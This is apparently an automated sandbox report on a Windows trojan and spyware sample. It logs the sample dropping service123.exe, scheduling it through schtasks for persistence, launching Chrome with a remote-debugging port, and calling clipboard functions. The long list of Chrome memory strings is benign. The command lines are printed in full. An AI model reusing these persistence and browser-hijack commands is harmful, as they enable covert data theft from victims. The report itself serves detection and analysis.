Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991822577.0000197C025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011093196.0000197C025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1994898189.0000197C025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992823183.0000197C025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991074408.0000197C025DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2016971939.0000197C0320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011721004.0000197C026FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000004.00000002.2013721715.0000197C02B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013082798.0000197C029F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011535207.0000197C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000004.00000002.2013721715.0000197C02B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyM
Source: chrome.exe, 00000004.00000002.2011535207.0000197C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
Source: chrome.exe, 00000004.00000002.2013721715.0000197C02B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013082798.0000197C029F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016809728.0000197C031A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011535207.0000197C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000004.00000002.2016809728.0000197C031A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
Source: chrome.exe, 00000004.00000002.2013721715.0000197C02B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013082798.0000197C029F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016809728.0000197C031A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011535207.0000197C0269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000004.00000002.2013901120.0000197C02BDB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010772592.0000197C024F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011467767.0000197C02694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000004.00000002.2016182661.0000197C03044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016248787.0000197C03058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016050679.0000197C0301C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000002.2016182661.0000197C03044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992769062.0000197C02910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016050679.0000197C0301C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016286586.0000197C0306C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000004.00000002.2016182661.0000197C03044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016248787.0000197C03058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016050679.0000197C0301C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000004.00000002.2016182661.0000197C03044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016248787.0000197C03058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992769062.0000197C02910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016286586.0000197C0306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010744567.0000197C024E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000004.00000002.2016182661.0000197C03044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016248787.0000197C03058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010744567.0000197C024E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000004.00000002.2016182661.0000197C03044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016248787.0000197C03058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992769062.0000197C02910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016286586.0000197C0306C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000002.2016182661.0000197C03044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992769062.0000197C02910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016050679.0000197C0301C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016286586.0000197C0306C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000004.00000002.2016182661.0000197C03044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016248787.0000197C03058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992769062.0000197C02910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016050679.0000197C0301C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2016286586.0000197C0306C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000004.00000002.2013901120.0000197C02BDB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010772592.0000197C024F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011467767.0000197C02694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011467767.0000197C02694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000002.2009781408.0000197C02288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.2009845291.0000197C022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015254722.0000197C02EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012806713.0000197C02938000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012772857.0000197C02928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015254722.0000197C02EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012806713.0000197C02938000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012772857.0000197C02928000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000002.2014152138.0000197C02C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000003.1981539073.0000197C02690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011467767.0000197C02694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1992501874.0000197C02EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012438025.0000197C028AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2014436124.0000197C02CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2017047870.0000197C0328C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015222235.0000197C02EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013401592.0000197C02A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015745219.0000197C02FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013401592.0000197C02A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015745219.0000197C02FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2016319192.0000197C03078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/es-USx(
Source: chrome.exe, 00000004.00000002.2014860575.0000197C02DC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011986994.0000197C027B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011721004.0000197C026FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2012849282.0000197C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000004.00000002.2014860575.0000197C02DC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icovements.
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2014260598.0000197C02C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2009525854.0000197C0220C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2011986994.0000197C027B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2012075889.0000197C027EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010709999.0000197C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0F9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0F9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0F9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0F9E27

System Summary

barindex
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F51B0 8_2_009F51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F3E20 8_2_009F3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C122CCE 8_2_6C122CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0ECD00 8_2_6C0ECD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0EEE50 8_2_6C0EEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F0FC0 8_2_6C0F0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C130AC0 8_2_6C130AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F44F0 8_2_6C0F44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1246E0 8_2_6C1246E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1207D0 8_2_6C1207D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1187C0 8_2_6C1187C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C130060 8_2_6C130060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C122090 8_2_6C122090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C112360 8_2_6C112360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C13DC70 8_2_6C13DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F5880 8_2_6C0F5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1198F0 8_2_6C1198F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C127A20 8_2_6C127A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12DBEE 8_2_6C12DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12140E 8_2_6C12140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C131510 8_2_6C131510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12F610 8_2_6C12F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C10F760 8_2_6C10F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E3000 8_2_6C0E3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1A50D0 8_2_6C1A50D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F70C0 8_2_6C0F70C0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1B3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1B3560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1B5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1B5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1B3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1AADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1B36E0 appears 45 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1828
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: secyibqm ZLIB complexity 0.9947168471269296
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/7@12/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7152
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000004.00000002.2013011523.0000197C029C8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 45%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2288,i,13659262306711728506,10044416239289748957,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1828
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2288,i,13659262306711728506,10044416239289748957,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
